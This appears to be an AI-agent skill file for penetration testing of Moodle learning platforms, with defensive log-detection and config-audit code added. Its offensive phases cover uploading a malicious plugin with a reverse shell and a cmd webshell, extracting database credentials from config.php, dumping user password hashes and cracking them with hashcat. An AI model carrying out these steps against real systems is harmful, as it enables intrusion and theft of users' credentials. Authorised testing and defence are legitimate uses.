Hacktricks-skills moodle-pentest

Security assessment and penetration testing for Moodle learning management systems. Use this skill whenever the user mentions Moodle, LMS security, educational platform pentesting, or needs to assess Moodle installations for vulnerabilities. Trigger for any Moodle-related security work including reconnaissance, vulnerability scanning, exploitation, or post-exploitation activities.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/moodle/SKILL.MD

Moodle Security Assessment

A comprehensive skill for conducting security assessments on Moodle learning management systems.

When to Use This Skill

Use this skill when:

  • Assessing Moodle installations for security vulnerabilities
  • Performing reconnaissance on educational platforms
  • Testing Moodle plugin security
  • Extracting credentials from compromised Moodle systems
  • Any security work involving Moodle LMS

Quick Start

# Run automated reconnaissance
python scripts/moodle_scan.py -u http://target.com/moodle/

# Check for known CVEs
python scripts/check_cves.py --version 3.9.0

Phase 1: Reconnaissance

Automated Scanning Tools

Run these tools to enumerate the Moodle installation:

Droopescan

pip3 install droopescan
droopescan scan moodle -u http://target.com/moodle/

What it finds:

  • Installed plugins and their paths
  • Moodle version detection
  • Interesting URLs (admin panels, readme files)
  • Exposed version files

Moodlescan

# Clone from https://github.com/inc0d3/moodlescan
python3 moodlescan.py -k -u http://target.com/moodle/

What it finds:

  • Server information (Apache, PHP versions)
  • Security headers
  • Moodle version via feature files
  • Known vulnerabilities

CMSMap

pip3 install git+https://github.com/dionach/CMSmap.git
cmsmap http://target.com/moodle/

What it finds:

  • General CMS enumeration
  • Plugin detection
  • Version information

Manual Version Detection

Check these endpoints for version information:

  • /admin/tool/lp/tests/behat/course_competencies.feature
  • /README.txt
  • /mod/*/version.php
  • /theme/*/version.php

CVE Research

Once you have the version, check for known vulnerabilities:

Phase 2: Exploitation

RCE via Plugin Installation

Prerequisites: Manager role with plugin installation enabled

  1. Navigate to Site administration → Plugins → Install plugins

  2. If plugin installation is disabled, check for privilege escalation:

  3. Upload a malicious plugin:

    # Use the bundled RCE plugin
    # Modify the IP and port before uploading
    unzip moodle-rce-plugin.zip
    # Edit the reverse shell IP/port in the plugin files
    zip -r moodle-rce-plugin.zip moodle-rce-plugin/
    
  4. Access the malicious plugin:

    http://target.com/moodle/blocks/rce/lang/en/block_rce.php?cmd=id
    

Alternative RCE Plugin

Use the plugin from https://github.com/HoangKien1020/Moodle_RCE for a standard PHP shell with a cmd parameter.
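From the defender's side, the version endpoints listed in Phase 1 and the plugin path requested in Phase 2 both leave distinctive entries in the web server access log. The following is an added example, not part of the original skill: it assumes combined log format, and the sample lines, the threshold and the finding names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Version-disclosure endpoints listed on this page (globs turned into a regex).
VERSION_PROBE = re.compile(
    r"/(admin/tool/lp/tests/behat/course_competencies\.feature|README\.txt"
    r"|(mod|theme)/[^/]+/version\.php)$")
# Moodle loads language files with include; a client requesting a PHP file
# under lang/ directly is unusual, and a cmd parameter on it more so.
LANG_PHP = re.compile(r"/lang/[^/]+/[^/]+\.php$")
# Combined log format: ip ident user [time] "METHOD target PROTO" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (ip, finding) for a request worth reviewing, else None."""
    m = LINE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    url = urlsplit(target)
    if LANG_PHP.search(url.path):
        has_cmd = "cmd" in parse_qs(url.query, keep_blank_values=True)
        kind = "lang-php-cmd" if has_cmd else "lang-php-direct"
        return ip, f"{kind} status={status}"
    if VERSION_PROBE.search(url.path):
        return ip, f"version-probe status={status}"
    return None

def scan(lines, probe_threshold=3):
    """Alert per client on any lang/ PHP hit or repeated version probes."""
    per_ip = {}
    for hit in filter(None, map(classify, lines)):
        per_ip.setdefault(hit[0], []).append(hit[1])
    alerts = {}
    for ip, hits in per_ip.items():
        probes = sum(h.startswith("version-probe") for h in hits)
        lang_hits = [h for h in hits if h.startswith("lang-php")]
        if lang_hits or probes >= probe_threshold:
            alerts[ip] = {"probes": probes, "lang_php": lang_hits}
    return alerts

# Constructed sample lines (documentation address ranges), not real traffic.
T = "[10/Mar/2024:10:00:00 +0000]"
SAMPLE = [
    f'203.0.113.7 - - {T} "GET /moodle/README.txt HTTP/1.1" 200 512',
    f'203.0.113.7 - - {T} "GET /moodle/mod/forum/version.php HTTP/1.1" 200 0',
    f'203.0.113.7 - - {T} "GET /moodle/theme/boost/version.php HTTP/1.1" 200 0',
    f'198.51.100.9 - - {T} "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=id HTTP/1.1" 200 54',
    f'192.0.2.44 - - {T} "GET /moodle/README.txt HTTP/1.1" 200 512',
]
```

`scan(SAMPLE)` alerts on the client that requested three version endpoints and on the one that requested a PHP file under `lang/`, while the single `README.txt` request stays below the threshold.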

Phase 3: Post-Exploitation

Find Configuration Files

find / -name "config.php" 2>/dev/null | grep "moodle/config.php"

The config.php contains:

  • Database credentials
  • Database name
  • Table prefix (usually mdl_)
  • Salt values
  • File storage paths

Extract Database Credentials

# From config.php, extract:
$CFG->dbuser = 'username';
$CFG->dbpass = 'password';
$CFG->dbname = 'moodle';
$CFG->dbtype = 'mysqli';

Dump User Credentials

/usr/local/bin/mysql -u <username> -p<password> -e "
  use moodle;
  select email, username, password from mdl_user;
  exit
"

Important: Moodle passwords are hashed. Use hashcat or john to crack them:

hashcat -m 1600 hashes.txt wordlist.txt

Additional Post-Exploitation

  • Check for other users with elevated privileges
  • Look for uploaded files in /moodledata/
  • Review scheduled tasks and cron jobs
  • Check for backup files

Common Vulnerabilities

Privilege Escalation

  • CVE-2020-14321: Manager privilege escalation
  • Check for misconfigured roles and capabilities

Plugin Vulnerabilities

  • Outdated plugins with known CVEs
  • Custom plugins with insecure code
  • File upload vulnerabilities in plugins

Information Disclosure

  • Exposed config.php
  • Version files in plugin directories
  • Debug mode enabled
  • Error messages revealing paths
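
The exposure points above and the plugin-installation vector from Phase 2 can be checked on the server itself. This is an added example, not code from the original skill: it audits a config.php for forced error display (`$CFG->debugdisplay`), for the `$CFG->disableupdateautodeploy` switch that turns off plugin installation through the web interface, for a data directory inside the web root, and for a world-readable file mode. The sample config, its paths and the finding texts are constructed, and the web root is passed in as an assumption.

```python
import re
import stat

# $CFG->name = value; assignments; commented-out lines are ignored.
ASSIGN = re.compile(r"^[ \t]*\$CFG->(\w+)\s*=\s*(.+?);[ \t]*(?://.*)?$", re.M)

def parse_cfg(text):
    """Map each $CFG setting to its raw PHP value (last assignment wins)."""
    return {k: v.strip().strip("'\"") for k, v in ASSIGN.findall(text)}

def audit(text, file_mode, web_root):
    """Return findings for the exposure points this page relies on."""
    cfg, findings = parse_cfg(text), []
    if file_mode & stat.S_IROTH:
        findings.append("config.php is world-readable")
    if cfg.get("debugdisplay", "0").lower() not in ("0", "false"):
        findings.append("debugdisplay forced on: errors and paths shown")
    if cfg.get("disableupdateautodeploy", "false").lower() not in ("1", "true"):
        findings.append("plugin installation via the web UI is not disabled")
    if cfg.get("dataroot", "").startswith(web_root.rstrip("/") + "/"):
        findings.append("dataroot is inside the web root")
    return findings

# Constructed sample config.php with placeholder values, not from a real site.
SAMPLE_CONFIG = """<?php
$CFG = new stdClass();
$CFG->dbtype   = 'mysqli';
$CFG->dbuser   = 'moodleuser';
$CFG->dbpass   = 'placeholder-password';
$CFG->prefix   = 'mdl_';
$CFG->dataroot = '/var/www/html/moodle/moodledata';
$CFG->debug = (E_ALL | E_STRICT);
$CFG->debugdisplay = 1;   // forces error display for every visitor
// $CFG->disableupdateautodeploy = true;
"""
HARDENED_CONFIG = (SAMPLE_CONFIG
    .replace("/var/www/html/moodle/moodledata", "/var/moodledata")
    .replace("debugdisplay = 1", "debugdisplay = 0")
    .replace("// $CFG->disable", "$CFG->disable"))

if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG, 0o644, "/var/www/html/moodle"):
        print("FINDING:", finding)
```

Debugging can also be switched on from the administration interface, which stores the setting in the database, so a clean result here only covers what config.php forces.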

Best Practices

  1. Always enumerate first - Don't skip reconnaissance
  2. Check multiple version sources - Different endpoints may show different versions
  3. Verify CVE applicability - Not all CVEs affect all versions
  4. Document findings - Track which plugins and versions are vulnerable
  5. Test plugin installation - This is often the most reliable RCE vector

Troubleshooting

Plugin Installation Fails

  • Check if you have the manager role
  • Verify plugin installation is enabled in Site administration
  • Try privilege escalation via CVE-2020-14321

Version Detection Fails

  • Try multiple endpoints
  • Check for custom themes hiding version info
  • Look at HTTP headers for clues

Database Access Denied

  • Verify credentials from config.php
  • Check if database is on a different host
  • Look for connection strings in other config files